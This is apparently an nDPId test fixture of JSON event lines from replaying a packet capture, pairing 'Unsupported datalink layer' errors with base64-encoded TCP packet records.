-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":473,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809768} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":473,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJFQABABoCkwKi0ArL40DbC2QBQ64tGkd7tzIuAECQR1AkAAAEBCAoANYulRwYTJw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":474,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809768} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":474,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJGQABABoCjwKi0ArL40DbC2QBQ64tGkd7t0feAECQ\/zm4AAAEBCAoANYulRwYTKA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":475,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809809} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":475,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJHQABABoCiwKi0ArL40DbC2QBQ64tGkd7t12OAECRsyMMAAAEBCAoANYupRwYTNg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":476,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809811} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":476,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJIQABABoChwKi0ArL40DbC2QBQ64tGkd7t3M+AECSZwycAAAEBCAoANYupRwYTOQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":477,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809820} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":477,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJJQABABoCgwKi0ArL40DbC2QBQ64tGkd7t4juAECTGvY4AAAEBCAoANYupRwYTOQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":478,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809861} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":478,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJKQABABoCfwKi0ArL40DbC2QBQ64tGkd7t56eAECT0t+cAAAEBCAoANYuuRwYTQQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":479,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809863} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":479,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJLQABABoCewKi0ArL40DbC2QBQ64tGkd7t7ROAECUhsk4AAAEBCAoANYuuRwYTQQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":480,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809872} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":480,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJMQABABoCdwKi0ArL40DbC2QBQ64tGkd7t8n+AECVOrLEAAAEBCAoANYuvRwYTRA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":481,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809874} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":481,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJNQABABoCcwKi0ArL40DbC2QBQ64tGkd7t9+uAECV7pxgAAAEBCAoANYuvRwYTRA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":482,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809932} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":482,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJOQABABoCPwKi0ArL40DbC2QBQ64tGkd7t9+uwECV7swMAAAEBCAoANYu1RwYTRAEBBQre7f1X3u4Cww=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":483,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809972} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":483,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMJPQABABoCGwKi0ArL40DbC2QBQ64tGkd7t9+vQECV7v0cAAAEBCAoANYu5RwYTRAEBBRLe7ggv3u4Nm97t\/Vfe7gLD"} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":484,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810383} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":484,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJQQABABoCNwKi0ArL40DbC2QBQ64tGkd7uAsOwECWpkbgAAAEBCAoANYviRwYTrAEBBQre7ggv3u4Nmw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":485,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810466} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":485,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMJRQABABoCEwKi0ArL40DbC2QBQ64tGkd7uAsPQECWpiEcAAAEBCAoANYvrRwYTrAEBBRLe7hMH3u4Yc97uCC\/e7g2b"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":486,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810471} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":486,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMJSQABABoCDwKi0ArL40DbC2QBQ64tGkd7uAsPQECWpgtsAAAEBCAoANYvrRwYTrAEBBRLe7hMH3u4d397uCC\/e7g2b"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":487,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810537} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":487,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJTQABABoCKwKi0ArL40DbC2QBQ64tGkd7uDZuwECXWa00AAAEBCAoANYvyRwYT5gEBBQre7hMH3u4d3w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":488,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810615} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":488,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMJUQABABoCBwKi0ArL40DbC2QBQ64tGkd7uDZvQECXWQVYAAAEBCAoANYv5RwYT5gEBBRLe7iNL3u4ot97uEwfe7h3f"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":489,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810689} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":489,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMJVQABABoCAwKi0ArL40DbC2QBQ64tGkd7uDZvQECXWO+IAAAEBCAoANYwBRwYT5gEBBRLe7iNL3u4uI97uEwfe7h3f"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":490,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810747} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":490,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMJWQABABoB\/wKi0ArL40DbC2QBQ64tGkd7uDZvQECXWNnAAAAEBCAoANYwHRwYT5gEBBRLe7iNL3u4zj97uEwfe7h3f"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":491,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810808} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":491,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMJXQABABoB+wKi0ArL40DbC2QBQ64tGkd7uDZvQECXWMP4AAAEBCAoANYwNRwYT5gEBBRLe7iNL3u44+97uEwfe7h3f"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":492,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810862} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":492,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJYQABABoCFwKi0ArL40DbC2QBQ64tGkd7uHd+wECYDLwYAAAEBCAoANYwSRwYUPAEBBQre7iNL3u44+w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":493,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810888} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":493,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJZQABABoCQwKi0ArL40DbC2QBQ64tGkd7uOPuAECYwY+gAAAEBCAoANYwVRwYUSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":494,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810889} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":494,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJaQABABoCPwKi0ArL40DbC2QBQ64tGkd7uPmeAECZeXk4AAAEBCAoANYwVRwYUSQ=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":495,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810935} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":495,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJbQABABoCOwKi0ArL40DbC2QBQ64tGkd7uQ9OAECaLWKYAAAEBCAoANYwZRwYUVA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":496,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810937} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":496,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJcQABABoCNwKi0ArL40DbC2QBQ64tGkd7uST+AECa4UwwAAAEBCAoANYwaRwYUVA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":497,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810938} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":497,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJdQABABoCMwKi0ArL40DbC2QBQ64tGkd7uTquAECblTXMAAAEBCAoANYwaRwYUVA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":498,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652810997} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":498,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJeQABABoCLwKi0ArL40DbC2QBQ64tGkd7uVBeAECcTR8wAAAEBCAoANYwgRwYUWw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":499,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652811023} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":499,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJfQABABoB+wKi0ArL40DbC2QBQ64tGkd7uVBewECcTm2IAAAEBCAoANYwiRwYUWwEBBQre7lmD3u5e7w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":500,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652811082} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":500,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJgQABABoB9wKi0ArL40DbC2QBQ64tGkd7uVBewECcTlfAAAAEBCAoANYwoRwYUWwEBBQre7lmD3u5kWw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":501,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652811156} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":501,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJhQABABoB8wKi0ArL40DbC2QBQ64tGkd7uVBewECcTkHwAAAEBCAoANYwwRwYUWwEBBQre7lmD3u5pxw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":502,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652811200} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":502,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJiQABABoCHwKi0ArL40DbC2QBQ64tGkd7uaceAECdAMaMAAAEBCAoANYw0RwYUkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":503,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652815197} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":503,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJjQABABoB6wKi0ArL40DbC2QBQ64tGkd7uacewECdAjoMAAAEBCAoANY3ERwYUkwEBBQre7lQX3u5Zgw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":504,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652815253} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":504,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJkQABABoB5wKi0ArL40DbC2QBQ64tGkd7uacewECdAWEYAAAEBCAoANY3JRwYUkwEBBQre7m8z3u50nw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":505,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652815254} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":505,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJlQABABoB4wKi0ArL40DbC2QBQ64tGkd7uacewECdAUtoAAAEBCAoANY3JRwYUkwEBBQre7m8z3u56Cw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":506,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652815324} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":506,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJmQABABoCDwKi0ArL40DbC2QBQ64tGkd7ueguAECdtG5YAAAEBCAoANY3QRwYYkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":507,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652815327} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":507,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJnQABABoB2wKi0ArL40DbC2QBQ64tGkd7ueguwECdtOPUAAAEBCAoANY3RRwYYkwEBBQre7nSf3u56Cw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":508,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652815327} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":508,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJoQABABoB1wKi0ArL40DbC2QBQ64tGkd7ueguwECdtI0UAAAEBCAoANY3RRwYYkwEBBQre7n933u6E4w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":509,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652815397} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":509,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJpQABABoB0wKi0ArL40DbC2QBQ64tGkd7ueguwECdtHdIAAAEBCAoANY3YRwYYkwEBBQre7n933u6KTw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":510,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652815468} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":510,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMJqQABABoBrwKi0ArL40DbC2QBQ64tGkd7uegvQECdtGvoAAAEBCAoANY3fRwYYkwEBBRLe7o+73u6VJ97uf3fe7opP"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":511,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652818681} -00331{"packet_event_id":1,"packet_event_name":"packet","packet_id":511,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPDy9QABABnyYwKi0AomHgzS0VhQCr\/++QwAAAACgAjkIx6AAAAIEBbQEAggKADWPIAAAAAABAwMG"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":512,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652820112} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":512,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJrQABABoBywKi0ArL40DbC2QBQ64tGkd7uik+wECea69gAAAEBCAoANY+vRwYdKAEBBQre7o+73u6VJw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":513,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652820137} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":513,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJsQABABoBxwKi0ArL40DbC2QBQ64tGkd7uik+wECea5mkAAAEBCAoANY+yRwYdKAEBBQre7o+73u6akw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":514,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652820139} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":514,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJtQABABoBwwKi0ArL40DbC2QBQ64tGkd7uik+wECea4P0AAAEBCAoANY+yRwYdKAEBBQre7o+73u6f\/w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":515,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652820169} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":515,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJuQABABoB7wKi0ArL40DbC2QBQ64tGkd7un\/+AECfI7pwAAAEBCAoANY+1RwYdWA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":516,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652820170} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":516,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJvQABABoBuwKi0ArL40DbC2QBQ64tGkd7un\/+wECfIwBQAAAEBCAoANY+1RwYdWAEBBQre7pqT3u6f\/w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":517,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652820172} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":517,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJwQABABoB5wKi0ArL40DbC2QBQ64tGkd7upWuAECf16QMAAAEBCAoANY+1RwYdWA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":518,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652820175} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":518,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJxQABABoB4wKi0ArL40DbC2QBQ64tGkd7uqteAECgi42kAAAEBCAoANY+1RwYdWQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":519,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652820237} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":519,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJyQABABoB3wKi0ArL40DbC2QBQ64tGkd7usEOAEChP3cIAAAEBCAoANY+8RwYdYA=="} 
